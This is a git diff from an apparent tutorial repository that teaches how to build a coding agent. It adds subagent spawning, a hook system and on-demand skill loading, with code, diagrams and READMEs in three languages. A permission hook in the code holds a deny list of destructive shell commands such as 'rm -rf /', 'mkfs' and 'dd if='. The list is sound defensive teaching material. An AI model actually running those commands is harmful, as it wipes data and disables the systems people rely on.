block.type == "tool_use": + handler = SUB_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + print(f" \033[90m[sub] {block.name}: {str(output)[:100]}\033[0m") + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": output}) + messages.append({"role": "user", "content": results}) + + result = extract_text(messages[-1]["content"]) + print(f"\033[35m[Subagent done]\033[0m") + return result # only summary, entire message history discarded + +# Add task tool to parent's tools +TOOLS.append({ + "name": "task", + "description": "Launch a subagent to handle a complex subtask. Returns only the final conclusion.", + "input_schema": {"type": "object", "properties": {"description": {"type": "string"}}, "required": ["description"]}, +}) +TOOL_HANDLERS["task"] = spawn_subagent + + +# ═══════════════════════════════════════════════════════════ +# FROM s04 (unchanged): Hook System +# ═══════════════════════════════════════════════════════════ + +HOOKS = {"UserPromptSubmit": [], "PreToolUse": [], "PostToolUse": [], "Stop": []} + +def register_hook(event: str, callback): + HOOKS[event].append(callback) + +def trigger_hooks(event: str, *args): + for callback in HOOKS[event]: + result = callback(*args) + if result is not None: + return result + return None + +DENY_LIST = ["rm -rf /", "sudo", "shutdown", "reboot", "mkfs", "dd if="] + +def permission_hook(block): + """PreToolUse: deny list check.""" + if block.name == "bash": + for p in DENY_LIST: + if p in block.input.get("command", ""): + print(f"\n\033[31m⛔ Blocked: '{p}'\033[0m") + return "Permission denied" + return None + +def log_hook(block): + """PreToolUse: log tool calls.""" + print(f"\033[90m[HOOK] {block.name}\033[0m") + return None + +def context_inject_hook(query: str): + """UserPromptSubmit: log working directory.""" + print(f"\033[90m[HOOK] UserPromptSubmit: working in {WORKDIR}\033[0m") + return None + +def summary_hook(messages: list): + """Stop: 
print tool call count.""" + tool_count = sum(1 for m in messages + for b in (m.get("content") if isinstance(m.get("content"), list) else []) + if isinstance(b, dict) and b.get("type") == "tool_result") + print(f"\033[90m[HOOK] Stop: session used {tool_count} tool calls\033[0m") + return None + +register_hook("UserPromptSubmit", context_inject_hook) +register_hook("PreToolUse", permission_hook) +register_hook("PreToolUse", log_hook) +register_hook("Stop", summary_hook) + + +# ═══════════════════════════════════════════════════════════ +# agent_loop — same as s05 + nag reminder, task auto-dispatches +# ═══════════════════════════════════════════════════════════ + +rounds_since_todo = 0 + +def agent_loop(messages: list): + global rounds_since_todo + while True: + # s05: nag reminder + if rounds_since_todo >= 3 and messages: + last = messages[-1] + if last["role"] == "user" and isinstance(last.get("content"), list): + last["content"].insert(0, { + "type": "text", + "text": "Update your todos.", + }) + + response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + + if response.stop_reason != "tool_use": + force = trigger_hooks("Stop", messages) + if force: + messages.append({"role": "user", "content": force}) + continue + return + + rounds_since_todo += 1 + results = [] + for block in response.content: + if block.type != "tool_use": + continue + + blocked = trigger_hooks("PreToolUse", block) + if blocked: + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": str(blocked)}) + continue + + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + + trigger_hooks("PostToolUse", block, output) + + if block.name == "todo_write": + rounds_since_todo = 0 + + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": output}) + + 
messages.append({"role": "user", "content": results}) + + +if __name__ == "__main__": + print("s06: Subagent — spawn sub-agents with fresh context, summary only") + print("Type a question, press Enter. Type q to quit.\n") + + history = [] + while True: + try: + query = input("\033[36ms06 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + trigger_hooks("UserPromptSubmit", query) + history.append({"role": "user", "content": query}) + agent_loop(history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + print() diff --git a/s06_subagent/images/subagent-overview.en.svg b/s06_subagent/images/subagent-overview.en.svg new file mode 100644 index 000000000..de21708d8 --- /dev/null +++ b/s06_subagent/images/subagent-overview.en.svg @@ -0,0 +1,121 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Subagent — Independent messages[], All Intermediate Steps Discarded + + + + Parent Agent + + + + messages[] + + + + + + + LLM + + + + tool_use + + + + TOOL_HANDLERS + + + + task → spawn + + + + Base Tools + bash / read / write / ... 
+ + + + Normal tool results → messages[] + + + + Subagent (Fresh Context) + + + + messages = [task] + fresh — no parent history + + + + + + + LLM + + + + Own while loop (max 30 rounds) + bash · read · write · edit · glob + No task — recursive spawn forbidden + + + + Intermediate 30+ tool calls + results + All discarded ✗ + + + + ✓ Extract only final text → return to Parent + + + + + ① dispatch + + + + + ② return summary + + + + + + s05 Preserved: loop, hooks, todo_write, 6 base tools + + + s06 New: task tool + spawn_subagent() — independent messages[], returns only summary + + + + ① Parent → Sub: + task description (a short string) + ② Sub → Parent: + extract_text() (final conclusion only) + diff --git a/s06_subagent/images/subagent-overview.ja.svg b/s06_subagent/images/subagent-overview.ja.svg new file mode 100644 index 000000000..50f28d3a7 --- /dev/null +++ b/s06_subagent/images/subagent-overview.ja.svg @@ -0,0 +1,121 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Subagent — 独立した messages[]、中間過程はすべて破棄 + + + + 親 Agent + + + + messages[] + + + + + + + LLM + + + + tool_use + + + + TOOL_HANDLERS + + + + task → spawn + + + + 基本ツール + bash / read / write / ... 
+ + + + 通常ツール結果 → messages[] + + + + サブエージェント(新規コンテキスト) + + + + messages = [task] + 新規 — 親の会話を継承しない + + + + + + + LLM + + + + 独自の while ループ(最大 30 ラウンド) + bash · read · write · edit · glob + task なし — 再帰 spawn 禁止 + + + + 中間 30+ ラウンドのツール呼び出し + 結果 + すべて破棄 ✗ + + + + ✓ 最後のテキストのみ抽出 → 親に返却 + + + + + ① dispatch + + + + + ② 要約を返却 + + + + + + s05 保持:ループ、フック、todo_write、6 つの基本ツール + + + s06 新規:task ツール + spawn_subagent() — 独立 messages[]、要約のみ返却 + + + + ① 親 → サブ: + task description(短い文字列) + ② サブ → 親: + extract_text()(最終結論のみ) + diff --git a/s06_subagent/images/subagent-overview.svg b/s06_subagent/images/subagent-overview.svg new file mode 100644 index 000000000..48484652e --- /dev/null +++ b/s06_subagent/images/subagent-overview.svg @@ -0,0 +1,121 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Subagent — 独立 messages[],中间过程全部丢弃 + + + + Parent Agent + + + + messages[] + + + + + + + LLM + + + + tool_use + + + + TOOL_HANDLERS + + + + task → spawn + + + + 基础工具 + bash / read / write / ... + + + + 普通工具结果回到 messages[] + + + + Subagent (全新上下文) + + + + messages = [task] + fresh — 不继承父对话 + + + + + + + LLM + + + + 自己的 while 循环(最多 30 轮) + bash · read · write · edit · glob + 无 task — 禁止递归 spawn + + + + 中间 30+ 轮工具调用 + 结果 + 全部丢弃 ✗ + + + + ✓ 只提取最后一段文本 → 返回给 Parent + + + + + ① dispatch + + + + + ② return 摘要 + + + + + + s05 保留:循环、钩子、todo_write、6 个基础工具 + + + s06 新增:task 工具 + spawn_subagent() — 独立 messages[],只回传摘要 + + + + ① Parent → Sub: + task description(一小段文字) + ② Sub → Parent: + extract_text()(只有最终结论) + diff --git a/s07_skill_loading/README.en.md b/s07_skill_loading/README.en.md new file mode 100644 index 000000000..a21b2d157 --- /dev/null +++ b/s07_skill_loading/README.en.md @@ -0,0 +1,159 @@ +# s07: Skill Loading — Load Only When Needed + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → s04 → s05 → s06 → `s07` → [s08](../s08_context_compact/) → s09 → ... 
→ s19 +> *"Load when needed, don't stuff the prompt"* — Inject via tool_result, not system prompt. +> +> **Harness Layer**: Knowledge — load on demand, don't fill the context. + +--- + +## The Problem + +Your project has a React component spec, a SQL style guide, and an API design doc. You want the Agent to follow these specs automatically. The most straightforward idea — stuff them all into the system prompt: + +```python +SYSTEM = ( + f"You are a coding agent. " + + open("docs/react-style.md").read() # 2000 lines + + open("docs/sql-style.md").read() # 1500 lines + + open("docs/api-design.md").read() # 3000 lines +) +``` + +6500 lines of system prompt. The Agent carries these docs on every LLM call — whether it's changing a CSS color or fixing a SQL query. 99% of the content is irrelevant to the current task, burning tokens for nothing. + +--- + +## The Solution + +![Skill Overview](images/skill-overview.en.svg) + +s06's loop, hooks, TODO, and sub-Agent are all preserved. The only change: at startup, inject the skill catalog into the SYSTEM prompt; at runtime, register one more tool `load_skill` (loads full content, spends tokens only when used). + +Two-level design: + +| Level | Location | Timing | Cost | +|-------|----------|--------|------| +| 1. Catalog | system prompt | Injected at startup (harness scans skills/) | ~100 tokens/skill, carried every turn | +| 2. Content | tool_result | When Agent calls load_skill | ~2000 tokens/skill, on demand | + +The loop changes not one line. `load_skill` auto-dispatches via `TOOL_HANDLERS[block.name]`. + +--- + +## How It Works + +**skills/ directory** — one subdirectory per skill, each containing a `SKILL.md` file: + +``` +skills/ + agent-builder/SKILL.md + code-review/SKILL.md + mcp-builder/SKILL.md + pdf/SKILL.md +``` + +**Level 1: Inject catalog at startup** — the harness scans the skills/ directory and writes each skill's name and one-line description into the SYSTEM prompt. 
The Agent sees "which skills I have available" every turn, with no extra API calls: + +```python +def build_system() -> str: + catalog = list_skills() # scan skills/ dir + return ( + f"You are a coding agent at {WORKDIR}. " + f"Skills available:\n{catalog}\n" + "Use load_skill to get full details when needed." + ) + +SYSTEM = build_system() # runs once at startup +``` + +**Level 2: load_skill** — the Agent decides "I need the SQL style guide" and calls `load_skill("sql-style")`. The content is injected via `tool_result`, exactly like reading a file: + +```python +def load_skill(name: str) -> str: + manifest = SKILLS_DIR / name / "SKILL.md" + if not manifest.exists(): + return f"Skill not found: {name}" + return manifest.read_text() +``` + +The key distinction: skill content is injected via `tool_result`, **not system prompt**. The Agent sees the content in the current conversation turn, but it's not automatically carried to the next LLM call. Reload if needed. + +It's like not keeping three reference books spread open on your desk at all times — you keep them on the shelf and pull one out when you need it. + +--- + +## Changes from s06 + +| Component | Before (s06) | After (s07) | +|-----------|-------------|-------------| +| Tool count | 7 (bash, read, write, edit, glob, todo_write, task) | 8 (+load_skill) | +| Knowledge loading | None | Two-level: startup catalog in SYSTEM + runtime load_skill | +| SYSTEM prompt | Static string | Startup scan of skills/ injects catalog | +| Loop | Unchanged | Unchanged (skill tool auto-dispatches) | + +--- + +## Try It + +```sh +cd learn-claude-code +python s07_skill_loading/code.py +``` + +Try these prompts: + +1. `What skills are available?` (should answer directly from the SYSTEM prompt catalog, no tool call) +2. `Load the code-review skill and follow its instructions` (should call load_skill) +3. 
`I need to do a code review -- load the relevant skill first`

What to watch for: Does the Agent know which skills are available directly from the SYSTEM catalog? Does it proactively call `load_skill` when it needs specific specs? Does the full skill content appear in the system prompt?

---

## What's Next

On-demand loading solved "don't carry what you shouldn't." But another problem looms — **how to drop what you should**. After the Agent works for 30 minutes, the messages list fills up with intermediate output: old tool_results, stale file contents occupying context but adding no value.

→ s08 Context Compact: A four-layer compaction strategy. Cheap layers run first, expensive layers run last.
+Dive into CC Source Code + +> The following is based on a complete analysis of CC source code `loadSkillsDir.ts` (1087 lines), `SkillTool.ts`, `bundledSkills.ts`. + +### 1. Skill Sources: Not Just One skills/ Directory + +The teaching version assumes all skills live in a `skills/` directory. CC actually loads from 10 sources (`loadSkillsDir.ts:638-1058`): managed/policy skills, user skills (`~/.claude/skills/`), project skills (`.claude/skills/`), `--add-dir` skills, legacy commands (`.claude/commands/`), dynamic skills, conditional skills, bundled skills, plugin skills, MCP skills. + +### 2. SKILL.md Frontmatter — Complete Fields + +CC's SKILL.md YAML frontmatter (`loadSkillsDir.ts:185-265`) has 16 fields: + +| Field | Purpose | +|-------|---------| +| `name` / `description` | Display name and description | +| `when_to_use` | Guides the model on when to invoke | +| `allowed-tools` | Auto-allow list of tools available to the skill | +| `context` | `inline` (default) or `fork` (run as sub-Agent) | +| `model` | Model override (haiku/sonnet/opus/inherit) | +| `hooks` | Skill-level hook configuration | +| `paths` | Glob patterns for conditional activation | +| `user-invocable` | Users can invoke via `/name` | + +### 3. Precise Implementation of Two-Level Loading + +1. **Catalog (at startup)**: `getSkillDirCommands()` scans directory → registers as `Command` objects containing only metadata. `getSkillListingAttachments()` formats the skill list as attachments, budgeted at ~1% of the context window (cap 8000 characters). +2. **Load (on invocation)**: Model calls `Skill` tool → `getPromptForCommand()` expands full SKILL.md content → injected into conversation via tool_result's `newMessages`. 
+ +### The Teaching Version's Simplification Is Intentional + +- 10 sources → 1 `skills/` directory: sufficient to demonstrate the core concept of two-level loading +- 16 frontmatter fields → only read first line as description: reduces parsing complexity +- Forked skills (`context: 'fork'`) → omitted: sub-Agent skill injection deferred to s13 + +
+ + diff --git a/s07_skill_loading/README.ja.md b/s07_skill_loading/README.ja.md new file mode 100644 index 000000000..8235e0eda --- /dev/null +++ b/s07_skill_loading/README.ja.md @@ -0,0 +1,159 @@ +# s07: Skill Loading — 必要なときにだけ読み込む + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → s04 → s05 → s06 → `s07` → [s08](../s08_context_compact/) → s09 → ... → s19 +> *"Load when needed, don't stuff the prompt"* — tool_result で注入、system prompt には詰め込まない。 +> +> **Harness レイヤー**: 知識 — 必要に応じて読み込み、コンテキストに詰め込まない。 + +--- + +## 課題 + +プロジェクトには React コンポーネント仕様、SQL スタイルガイド、API 設計ドキュメントがある。Agent にこれらの仕様を自動的に守らせたい。最も直接的な方法 — すべて system prompt に詰め込む: + +```python +SYSTEM = ( + f"You are a coding agent. " + + open("docs/react-style.md").read() # 2000 行 + + open("docs/sql-style.md").read() # 1500 行 + + open("docs/api-design.md").read() # 3000 行 +) +``` + +6500 行の system prompt。Agent は LLM を呼び出すたびにこれらのドキュメントを運ぶ — CSS の色を変えるときも SQL クエリを修正するときも。99% の内容が現在のタスクと無関係で、トークンを無駄に消費する。 + +--- + +## ソリューション + +![Skill Overview](images/skill-overview.ja.svg) + +s06 のループ、フック、TODO、サブ Agent はすべて維持される。唯一の変更:起動時にスキルカタログを SYSTEM prompt に注入し、実行時に新しいツール `load_skill` を登録する(完全な内容を読み込み、使ったときだけトークンを消費)。 + +2 層設計: + +| 層 | 場所 | タイミング | コスト | +|---|------|-----------|--------| +| 1. カタログ | system prompt | 起動時に注入(harness が skills/ をスキャン) | ~100 トークン/スキル、毎ターン携帯 | +| 2. 
内容 | tool_result | Agent が load_skill を呼び出したとき | ~2000 トークン/スキル、オンデマンド | + +ループは 1 行も変更されない。`load_skill` は `TOOL_HANDLERS[block.name]` を通じて自動的にディスパッチされる。 + +--- + +## 仕組み + +**skills/ ディレクトリ** — スキルごとに 1 つのサブディレクトリ、それぞれに `SKILL.md` ファイルを含む: + +``` +skills/ + agent-builder/SKILL.md + code-review/SKILL.md + mcp-builder/SKILL.md + pdf/SKILL.md +``` + +**第 1 層:起動時にカタログを注入** — harness が skills/ ディレクトリをスキャンし、各スキルの名前と一言の説明を SYSTEM prompt に書き込む。Agent は毎ターン「どのスキルが利用可能か」を確認できる。追加の API 呼び出しは不要: + +```python +def build_system() -> str: + catalog = list_skills() # scan skills/ dir + return ( + f"You are a coding agent at {WORKDIR}. " + f"Skills available:\n{catalog}\n" + "Use load_skill to get full details when needed." + ) + +SYSTEM = build_system() # runs once at startup +``` + +**第 2 層:load_skill** — Agent が「SQL スタイルガイドが必要」と判断し、`load_skill("sql-style")` を呼び出す。内容は `tool_result` を通じて注入される。ファイルを読むのと全く同じ: + +```python +def load_skill(name: str) -> str: + manifest = SKILLS_DIR / name / "SKILL.md" + if not manifest.exists(): + return f"Skill not found: {name}" + return manifest.read_text() +``` + +重要な違い:スキル内容は `tool_result` を通じて注入され、**system prompt ではない**。Agent は現在の会話ターンで内容を見るが、次の LLM 呼び出しには自動的に引き継がれない。必要に応じて再読み込みする。 + +これは、3 冊の参考書を常に机の上に広げておくのではなく、本棚に置いて必要な本を取り出すようなものだ。 + +--- + +## s06 からの変更点 + +| コンポーネント | 変更前 (s06) | 変更後 (s07) | +|---------------|-------------|-------------| +| ツール数 | 7 (bash, read, write, edit, glob, todo_write, task) | 8 (+load_skill) | +| 知識読み込み | なし | 2 層:起動時カタログ注入 SYSTEM + 実行時 load_skill | +| SYSTEM プロンプト | 静的文字列 | 起動時に skills/ をスキャンしてカタログ注入 | +| ループ | 変更なし | 変更なし(スキルツールは自動ディスパッチ) | + +--- + +## 試してみよう + +```sh +cd learn-claude-code +python s07_skill_loading/code.py +``` + +以下のプロンプトを試してみよう: + +1. `What skills are available?`(SYSTEM prompt のカタログから直接回答するはず、ツール呼び出しなし) +2. `Load the code-review skill and follow its instructions`(load_skill を呼び出すはず) +3. 
`I need to do a code review -- load the relevant skill first` + +観察のポイント:Agent は SYSTEM 内のカタログから利用可能なスキルを知っているか? 具体的な仕様が必要なときに `load_skill` を積極的に呼び出すか? system prompt にスキルの完全な内容が含まれているか? + +--- + +## 次へ + +オンデマンド読み込みで「運ぶべきでないものは運ばない」問題は解決した。しかし別の問題が待っている — **捨てるべきものをどう捨てるか**。Agent が 30 分連続で作業すると、messages リストが中間プロセスで埋め尽くされる。古い tool_result、期限切れのファイル内容 — コンテキストを占領しているが価値を生まない。 + +→ s08 Context Compact:4 層圧縮戦略。安価な層を先に実行、高価な層を後に実行。 + +
+CC ソースコードを深掘り + +> 以下は CC ソースコード `loadSkillsDir.ts`(1087 行)、`SkillTool.ts`、`bundledSkills.ts` の完全分析に基づく。 + +### 一、スキルソース:skills/ ディレクトリだけではない + +教育版はすべてのスキルが `skills/` ディレクトリにあると想定している。CC は実際には 10 のソースから読み込む(`loadSkillsDir.ts:638-1058`):managed/policy skills、user skills(`~/.claude/skills/`)、project skills(`.claude/skills/`)、`--add-dir` skills、legacy commands(`.claude/commands/`)、dynamic skills、conditional skills、bundled skills、plugin skills、MCP skills。 + +### 二、SKILL.md Frontmatter — 完全なフィールド + +CC の SKILL.md YAML frontmatter(`loadSkillsDir.ts:185-265`)には 16 のフィールドがある: + +| フィールド | 用途 | +|-----------|------| +| `name` / `description` | 表示名と説明 | +| `when_to_use` | モデルにいつ呼び出すかを指導 | +| `allowed-tools` | スキルが使用可能なツールの自動許可リスト | +| `context` | `inline`(デフォルト)または `fork`(サブ Agent として実行) | +| `model` | モデルオーバーライド(haiku/sonnet/opus/inherit) | +| `hooks` | スキルレベルのフック設定 | +| `paths` | 条件付きアクティベーションの glob パターン | +| `user-invocable` | ユーザーが `/name` で呼び出し可能 | + +### 三、2 層読み込みの正確な実装 + +1. **カタログ(起動時)**:`getSkillDirCommands()` がディレクトリをスキャン → メタデータのみを含む `Command` オブジェクトとして登録。`getSkillListingAttachments()` がスキルリストを添付ファイルとしてフォーマット、コンテキストウィンドウの ~1% を予算とする(上限 8000 文字)。 +2. **読み込み(呼び出し時)**:モデルが `Skill` ツールを呼び出す → `getPromptForCommand()` が完全な SKILL.md 内容を展開 → tool_result の `newMessages` を通じて会話に注入。 + +### 教育版の単純化は意図的 + +- 10 のソース → 1 つの `skills/` ディレクトリ:2 層読み込みの核心概念を示すのに十分 +- 16 の frontmatter フィールド → 最初の行だけを説明として読み取り:解析の複雑さを削減 +- forked skills(`context: 'fork'`)→ 省略:サブ Agent のスキル注入は s13 に委ねる + +
+ + diff --git a/s07_skill_loading/README.md b/s07_skill_loading/README.md new file mode 100644 index 000000000..2b2a43059 --- /dev/null +++ b/s07_skill_loading/README.md @@ -0,0 +1,159 @@ +# s07: Skill Loading — 用到的时候才加载 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → s04 → s05 → s06 → `s07` → [s08](../s08_context_compact/) → s09 → ... → s19 +> *"用到时再加载, 别全塞 prompt 里"* — 通过 tool_result 注入, 不塞 system prompt。 +> +> **Harness 层**: 知识 — 按需加载, 不堆满上下文。 + +--- + +## 问题 + +你的项目有一套 React 组件规范、一份 SQL 风格指南、一份 API 设计文档。你希望 Agent 自动遵守这些规范。最直接的想法——全塞进 system prompt: + +```python +SYSTEM = ( + f"You are a coding agent. " + + open("docs/react-style.md").read() # 2000 行 + + open("docs/sql-style.md").read() # 1500 行 + + open("docs/api-design.md").read() # 3000 行 +) +``` + +6500 行 system prompt。Agent 每次调用 LLM 都带着这些文档——不管是在改 CSS 颜色还是修 SQL 查询。99% 的内容和当前任务无关,白白消耗 token。 + +--- + +## 解决方案 + +![Skill Overview](images/skill-overview.svg) + +s06 的循环、钩子、TODO、子 Agent 全部保留。唯一的变化:启动时把技能目录注入 SYSTEM prompt,运行时多注册一个工具 `load_skill`(加载完整内容,用到才花 token)。 + +两层设计: + +| 层 | 位置 | 时机 | 代价 | +|---|------|------|------| +| 1. 目录 | system prompt | 启动时注入(harness 扫描 skills/) | ~100 tokens/skill,每轮都带 | +| 2. 内容 | tool_result | Agent 调用 load_skill 时 | ~2000 tokens/skill,按需 | + +循环一行不改。load_skill 自动通过 `TOOL_HANDLERS[block.name]` 分发。 + +--- + +## 工作原理 + +**skills/ 目录**——每个技能一个子目录,包含 `SKILL.md` 文件: + +``` +skills/ + agent-builder/SKILL.md + code-review/SKILL.md + mcp-builder/SKILL.md + pdf/SKILL.md +``` + +**第一级:启动时注入目录**——harness 扫描 skills/ 目录,把每个技能的名字和一句话简介写进 SYSTEM prompt。Agent 每轮都能看到"我有哪些技能可用",不花额外 API 调用: + +```python +def build_system() -> str: + catalog = list_skills() # scan skills/ dir + return ( + f"You are a coding agent at {WORKDIR}. " + f"Skills available:\n{catalog}\n" + "Use load_skill to get full details when needed." 
+ ) + +SYSTEM = build_system() # runs once at startup +``` + +**第二级:load_skill**——Agent 决定"我需要 SQL 风格指南",调用 `load_skill("sql-style")`。内容通过 `tool_result` 注入,和读文件一模一样: + +```python +def load_skill(name: str) -> str: + manifest = SKILLS_DIR / name / "SKILL.md" + if not manifest.exists(): + return f"Skill not found: {name}" + return manifest.read_text() +``` + +关键区别:技能内容通过 `tool_result` 注入,**不是 system prompt**。Agent 在当前对话中看到内容,但下次 LLM 调用时不自动携带。需要的话重新加载。 + +这就像你不会把三本参考书一直摊在桌上——你把它们放在书架上,用到哪本抽哪本。 + +--- + +## 相对 s06 的变更 + +| 组件 | 之前 (s06) | 之后 (s07) | +|------|-----------|-----------| +| 工具数量 | 7 (bash, read, write, edit, glob, todo_write, task) | 8 (+load_skill) | +| 知识加载 | 无 | 两级:启动时目录注入 SYSTEM + 运行时 load_skill | +| SYSTEM 提示 | 静态字符串 | 启动时扫描 skills/ 注入目录 | +| 循环 | 不变 | 不变(skill 工具自动分发) | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s07_skill_loading/code.py +``` + +试试这些 prompt: + +1. `What skills are available?`(应该直接从 SYSTEM prompt 里的目录回答,不调工具) +2. `Load the code-review skill and follow its instructions`(应该调 load_skill) +3. `I need to do a code review -- load the relevant skill first` + +观察重点:Agent 是否直接从 SYSTEM 里的目录知道有哪些技能?它在需要具体规范时主动调了 `load_skill` 吗?system prompt 里有没有出现 skill 的完整内容? + +--- + +## 接下来 + +按需加载解决了"不该带的不要带"。但另一个问题来了——**该丢的怎么丢**。Agent 连续工作 30 分钟后,messages 列表塞满了中间过程。旧的 tool_result、过时的文件内容——占着上下文但不产生价值。 + +s08 Context Compact → 四层压缩策略。便宜的先跑,贵的后跑。 + +
+深入 CC 源码 + +> 以下基于 CC 源码 `loadSkillsDir.ts`(1087 行)、`SkillTool.ts`、`bundledSkills.ts` 的完整分析。 + +### 一、技能来源:不是只有一个 skills/ 目录 + +教学版假设所有技能在 `skills/` 目录下。CC 实际从 10 个来源加载(`loadSkillsDir.ts:638-1058`):managed/policy skills、user skills(`~/.claude/skills/`)、project skills(`.claude/skills/`)、`--add-dir` skills、legacy commands(`.claude/commands/`)、dynamic skills、conditional skills、bundled skills、plugin skills、MCP skills。 + +### 二、SKILL.md Frontmatter 完整字段 + +CC 的 SKILL.md YAML frontmatter(`loadSkillsDir.ts:185-265`)有 16 个字段: + +| 字段 | 用途 | +|------|------| +| `name` / `description` | 显示名称和描述 | +| `when_to_use` | 指导模型何时调用 | +| `allowed-tools` | 技能可用工具的自动允许列表 | +| `context` | `inline`(默认)或 `fork`(作为子 Agent 运行) | +| `model` | 模型覆盖(haiku/sonnet/opus/inherit) | +| `hooks` | 技能级别的 hook 配置 | +| `paths` | 条件激活的 glob 模式 | +| `user-invocable` | 用户可以通过 `/name` 调用 | + +### 三、两级加载的精确实现 + +1. **Catalog(启动时)**:`getSkillDirCommands()` 扫描目录 → 注册为 `Command` 对象,只包含元数据。`getSkillListingAttachments()` 把技能列表格式化为附件,预算为上下文窗口的 ~1%(上限 8000 字符)。 +2. **Load(调用时)**:模型调 `Skill` 工具 → `getPromptForCommand()` 展开完整 SKILL.md 内容 → 通过 tool_result 的 `newMessages` 注入对话。 + +### 教学版的简化是刻意的 + +- 10 个来源 → 1 个 `skills/` 目录:足以展示两级加载的核心概念 +- 16 个 frontmatter 字段 → 只读第一行作为简介:减少解析复杂度 +- forked skills(`context: 'fork'`)→ 省略:子 Agent 的技能注入留给 s13 + +
+ + diff --git a/s07_skill_loading/code.py b/s07_skill_loading/code.py new file mode 100644 index 000000000..16636c43f --- /dev/null +++ b/s07_skill_loading/code.py @@ -0,0 +1,357 @@ +#!/usr/bin/env python3 +""" +s07: Skill Loading — two-level on-demand knowledge injection. + + Layer 1 (cheap, always present): + SYSTEM prompt includes skill names + one-line descriptions (~100 tokens/skill) + "Skills available: agent-builder, code-review, mcp-builder, pdf" + + Layer 2 (expensive, on demand): + Agent calls load_skill("code-review") → full SKILL.md content + injected via tool_result (~2000 tokens/skill) + + skills/ + agent-builder/SKILL.md + code-review/SKILL.md + mcp-builder/SKILL.md + pdf/SKILL.md + +Changes from s06: + + build_system() — scan skills/ dir at startup, inject catalog into SYSTEM + + load_skill(name) — return full SKILL.md content via tool_result + + SKILLS_DIR config + Loop unchanged: load_skill auto-dispatches via TOOL_HANDLERS. + +Run: python s07_skill_loading/code.py +Needs: pip install anthropic python-dotenv + ANTHROPIC_API_KEY in .env +""" + +import os, subprocess, json +from pathlib import Path + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +SKILLS_DIR = WORKDIR / "skills" +TASKS_DIR = WORKDIR / ".tasks"; TASKS_DIR.mkdir(exist_ok=True) +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +# s07: Skill catalog scan (used by build_system below) +def list_skills() -> str: + """List all skills (name + one-line description).""" + if not SKILLS_DIR.exists(): + return "(no skills directory found)" + skills = [] + for d in sorted(SKILLS_DIR.iterdir()): + if not d.is_dir(): + continue + manifest = d / "SKILL.md" + if manifest.exists(): + name = 
d.name + desc = manifest.read_text().split("\n")[0].lstrip("#").strip() + skills.append(f"- **{name}**: {desc}") + return "\n".join(skills) if skills else "(no skills found)" + +# s07: SYSTEM includes skill catalog (cheap — just names + descriptions) +def build_system() -> str: + """Build SYSTEM prompt with skill catalog injected at startup.""" + catalog = list_skills() + return ( + f"You are a coding agent at {WORKDIR}. " + f"Skills available:\n{catalog}\n" + "Use load_skill to get full details when needed." + ) + +SYSTEM = build_system() + + +# ═══════════════════════════════════════════════════════════ +# FROM s02-s06 (unchanged): Tool Implementations +# ═══════════════════════════════════════════════════════════ + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... 
({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + +def run_write(path: str, content: str) -> str: + try: + file_path = safe_path(path) + file_path.parent.mkdir(parents=True, exist_ok=True) + file_path.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + +def run_edit(path: str, old_text: str, new_text: str) -> str: + try: + file_path = safe_path(path) + text = file_path.read_text() + if old_text not in text: + return f"Error: text not found in {path}" + file_path.write_text(text.replace(old_text, new_text, 1)) + return f"Edited {path}" + except Exception as e: + return f"Error: {e}" + +def run_glob(pattern: str) -> str: + import glob as g + try: + results = g.glob(pattern, root_dir=WORKDIR) + return "\n".join(results) if results else "(no matches)" + except Exception as e: + return f"Error: {e}" + +def run_todo_write(todos: list) -> str: + tasks_file = TASKS_DIR / "current_todos.json" + tasks_file.write_text(json.dumps(todos, indent=2, ensure_ascii=False)) + lines = ["\n\033[33m## Current Tasks\033[0m"] + for t in todos: + icon = {"pending": " ", "in_progress": "\033[36m▸\033[0m", "completed": "\033[32m✓\033[0m"}[t["status"]] + lines.append(f" [{icon}] {t['content']}") + print("\n".join(lines)) + return f"Updated {len(todos)} tasks" + +def extract_text(content) -> str: + if not isinstance(content, list): + return str(content) + return "\n".join(getattr(b, "text", "") for b in content if getattr(b, "type", None) == "text") + + +# ═══════════════════════════════════════════════════════════ +# FROM s06 (unchanged): Subagent +# ═══════════════════════════════════════════════════════════ + +SUB_TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", "properties": {"command": {"type": "string"}}, "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + 
